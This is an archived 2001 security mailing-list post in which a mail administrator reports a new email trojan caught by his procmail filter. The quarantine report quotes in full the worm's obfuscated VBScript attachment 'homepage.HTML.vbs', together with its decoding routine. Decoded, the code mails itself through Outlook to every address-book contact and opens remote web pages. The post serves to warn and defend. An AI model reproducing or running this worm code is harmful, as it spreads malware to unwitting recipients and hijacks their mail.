[Esa-l]Here's a new one....

Brett Glass brett at lariat.org
Wed May 9 08:20:17 PDT 2001


Here's a Trojan I've never seen before.... Both our own ruleset
and John's sanitizer triggered on it (output from John's is shown). 
It looks to have been generated by the same toolkit that was used 
to create the Anna Kournikova worm.

--Brett

Date: Wed, 9 May 2001 02:13:14 -0600 (MDT)
Message-Id: <200105090813.CAA23211 at lariat.org>
To: brett at lariat.org
From: "Procmail Security daemon" <postmaster at lariat.org>
Subject: SECURITY WARNING - possible email attack
X-Loop: EMAIL SECURITY WARNING lariat.org 
X-UIDL: f3041bcb8121dd7a2771ec7e8c0cf7f8

REPORT: Trapped poisoned executable "homepage.HTML.vbs"
REPORT: Not a document, or already poisoned by filename. Not scanned for macros.
STATUS: Message quarantined in /dev/null, not delivered to recipient.

Message:

> From edelinetan at stegami.com  Wed May  9 02:13:13 2001
> Return-Path: <edelinetan at stegami.com>
> Received: from stegami.com ([203.126.135.249])
> 	by lariat.org (8.9.3/8.9.3) with SMTP id CAA23202
> 	for <brett at lariat.org>; Wed, 9 May 2001 02:13:11 -0600 (MDT)
> Received: from stegamiedeline ([155.69.174.33]) by stegami.com ; Wed, 09 May 2001 16:27:42 +0800 SGT
> From: "Edeline Tan" <edelinetan at stegami.com>
> To: "BRETT GLASS" <brett at lariat.org>
> Subject: Homepage
> Date: Wed, 9 May 2001 16:20:31 +0800
> Message-ID: <028a01c0d860$e99c2b80$21ae459b at stegamiedeline>
> MIME-Version: 1.0
> X-Security: Warning! Do not open files attached to e-mail if you do not
> 	have an up-to-date virus protection program or did not expect to
> 	receive them. Even if the message is from someone you know, an
> 	attachment can contain a virus sent without his or her knowledge.
> Content-Type: multipart/mixed;
> 	boundary="----=_NextPart_000_028B_01C0D8A3.F7BF6B80"
> X-Priority: 3 (Normal)
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
> Importance: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
> 
> This is a multi-part message in MIME format.
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80
> Content-Type: text/plain; charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> 
> 
> Hi!
> 
> You've got to see this page! It's really cool ;O)
> 
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80
> Content-Type: TEXT/PLAIN;
> X-Content-Security: [lariat.org] NOTIFY
> X-Content-Security: [lariat.org] REPORT: Trapped poisoned executable "homepage.HTML.vbs"
> X-Content-Security: [lariat.org] QUARANTINE
> Content-Description: SECURITY WARNING
> 
> SECURITY WARNING!
> The mail system has detected that the following
> attachment may contain hazardous executable code,
> is a suspicious file type or has a suspicious file name.
> Contact your system administrator immediately!
> 
> Content-Type: application/octet-stream; name="homepage.HTML.23208DEFANGED-vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment; filename="homepage.HTML.23208DEFANGED-vbs"
> 
> Execute =
> DeCode("Qp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11YU=11?=11EtgcvgQdlgev*$YUet=
> krv0Ujgnn$+=10=0FUgv=11HUQ?=11Etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$+=10=
> =0FHqnfgt?HUQ0IgvUrgekcnHqnfgt*4+=10=0F=10=0FUgv=11KpH?HUQ0QrgpVgzvHkng*Y=
> Uetkrv0UetkrvHwnnpcog.3+=10=0FFq=11Yjkng=11KpH0CvGpfQhUvtgco>@Vtwg=10=0FU=
> etkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnh=10=0FNqqr=10=0F=10=0FUgv=11Q=
> wvH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+=10=0FQwvH0ytkvg=11=
> UetkrvDwhhgt=10=0FQwvH0enqug=10=0FUgv=11HUQ?Pqvjkpi=10=0F=10=0FKh=11YU0tg=
> itgcf=11*$JMEW^uqhvyctg^Cp^ockngf$+=11>@=11$3$=11vjgp=10=0FOcknkv*+=10=0F=
> Gpf=11Kh=10=0F=10=0FUgv=11u?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+=10=0FUgv=11=
> v?u0IgvPcogUrceg*$OCRK$+=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*8+=10=0FHqt=11k?=
> 3=11vq=11w0kvgou0eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$=11Vjg=
> p=10=0Fw0Kvgou0Kvgo*k+0enqug=10=0Fw0Kvgou0Kvgo*k+0fgngvg=10=0FGpf=11Kh=10=
> =0FPgzv=10=0FUgv=11w?v0IgvFghcwnvHqnfgt*5+=10=0FHqt=11k?3=11vq=11w0kvgou0=
> eqwpv=10=0FKh=11w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$=11Vjgp=10=0Fw0Kvgou0Kv=
> go*k+0fgngvg=10=0FGpf=11Kh=10=0FPgzv=10=0F=10=0FTcpfqok|g=10=0Ft?Kpv**6,T=
> pf+-3+=10=0FKh=11t?3=11vjgp=10=0FYU0Twp*$jvvr<11jctfeqtg0rqtpdknndqctf0pg=
> v1ujcppqp130jvo$+=10=0Fgnugkh=11t?4=11Vjgp=10=0FYU0Twp*$jvvr<11ogodgtu0pd=
> ek0eqo1aZOEO1rtkp|lg130jvo$+=10=0Fgnugkh=11t?5=11Vjgp=10=0FYU0Twp*$jvvr<1=
> 1yyy40ugzetqrqnku0eqo1cocvgwt1ujgknc130jvo$+=10=0FGnugKh=11t?6=11Vjgp=10=0F=
> YU0Twp*$jvvr<11ujgknc0kuugz{0vx130jvo$+=10=0FGpf=11Kh=10=0F=10=0FHwpevkqp=
> =11Ocknkv*+=10=0FQp=11Gttqt=11Tguwog=11Pgzv=10=0FUgv=11Qwvnqqm=11?=11Etgc=
> vgQdlgev*$Qwvnqqm0Crrnkecvkqp$+=10=0FKh=11Qwvnqqm=11?=11$Qwvnqqm$=11Vjgp=10=
> =0F=12Ugv=11Ocrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+=10=0F=12Ugv=11Nkuvu?Ocrk0Cf=
> ftguuNkuvu=10=0F=12Hqt=11Gcej=11NkuvKpfgz=11Kp=11Nkuvu=10=0F=12=12Kh=11Nk=
> uvKpfgz0CfftguuGpvtkgu0Eqwpv=11>@=112=11Vjgp=10=0F=12=12=12EqpvcevEqwpv=11=
> ?=11NkuvKpfgz0CfftguuGpvtkgu0Eqwpv=10=0F=12=12=12Hqt=11Eqwpv?=113=11Vq=11=
> EqpvcevEqwpv=10=0F=12=12=12=12Ugv=11Ockn=11?=11Qwvnqqm0EtgcvgKvgo*2+=10=0F=
> =12=12=12=12Ugv=11Eqpvcev=11?=11NkuvKpfgz0CfftguuGpvtkgu*Eqwpv+=10=0F=12=12=
> =12=12Ockn0Vq=11?=11Eqpvcev0Cfftguu=10=0F=12=12=12=12Ockn0Uwdlgev=11?=11$=
> Jqogrcig$=10=0F=12=12=12=12Ockn0Dqf{=11?=11xdetnh($Jk#$(xdetnh(xdetnh($[q=
> w)xg=11iqv=11vq=11ugg=11vjku=11rcig#=11Kv)u=11tgcnn{=11eqqn=11=3DQ+$(xdet=
> nh(xdetnh=10=0F=12=12=12=12Ugv=11Cvvcejogpv?Ockn0Cvvcejogpvu=10=0F=12=12=12=
> =12Cvvcejogpv0Cff=11Hqnfgt=11(=11$^jqogrcig0JVON0xdu$=10=0F=12=12=12=12Oc=
> kn0FgngvgChvgtUwdokv=11?=11Vtwg=10=0F=12=12=12=12Kh=11Ockn0Vq=11>@=11$$=11=
> Vjgp=10=0F=12=12=12=12Ockn0Ugpf=10=0F=12=12=12=12YU0tgiytkvg=11$JMEW^uqhv=
> yctg^Cp^ockngf$.=11$3$=10=0F=12=12=12Gpf=11Kh=10=0F=12=12=12Pgzv=10=0F=12=
> =12Gpf=11Kh=10=0F=12Pgzv=10=0FGpf=11kh=10=0FGpf=11Hwpevkqp")
> Function DeCode(Coded)
> For I =3D 1 To Len(Coded)
> CurChar=3D Mid(Coded, I, 1)
> If Asc(CurChar) =3D 15 Then
> CurChar=3D Chr(10)
> ElseIf Asc(CurChar) =3D 16 Then
> CurChar=3D Chr(13)
> ElseIf Asc(CurChar) =3D 17 Then
> CurChar=3D Chr(32)
> ElseIf Asc(CurChar) =3D 18 Then
> CurChar=3D Chr(9)
> Else
> CurChar =3D Chr(Asc(CurChar) - 2)
> End If
> DeCode =3D DeCode & CurChar
> Next
> End Function
> 
> ------=_NextPart_000_028B_01C0D8A3.F7BF6B80--



More information about the esd-l mailing list